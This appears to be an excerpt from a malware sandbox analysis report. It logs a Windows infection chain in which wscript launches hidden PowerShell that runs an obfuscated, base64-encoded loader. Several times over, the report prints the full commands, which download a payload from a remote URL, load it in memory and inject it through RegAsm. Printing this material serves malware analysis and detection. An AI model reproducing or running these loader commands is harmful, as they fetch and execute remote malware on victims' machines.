                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Obfuscated command line found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0C905B9 push edi; retf 8_2_00007FF7C0C905BA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0C900BD pushad ; iretd 8_2_00007FF7C0C900C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0C9101D pushad ; retf 8_2_00007FF7C0C91022
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF7C0C9E37E pushad ; iretd 10_2_00007FF7C0C9E399
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF7C0C91425 pushad ; retf 10_2_00007FF7C0C9142A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF7C0C97563 push ebx; iretd 10_2_00007FF7C0C9756A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF7C0C900BD pushad ; iretd 10_2_00007FF7C0C900C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457186 push ecx; ret 11_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045E55D push esi; ret 11_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457AA8 push eax; ret 11_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434EB6 push ecx; ret 11_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW,11_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
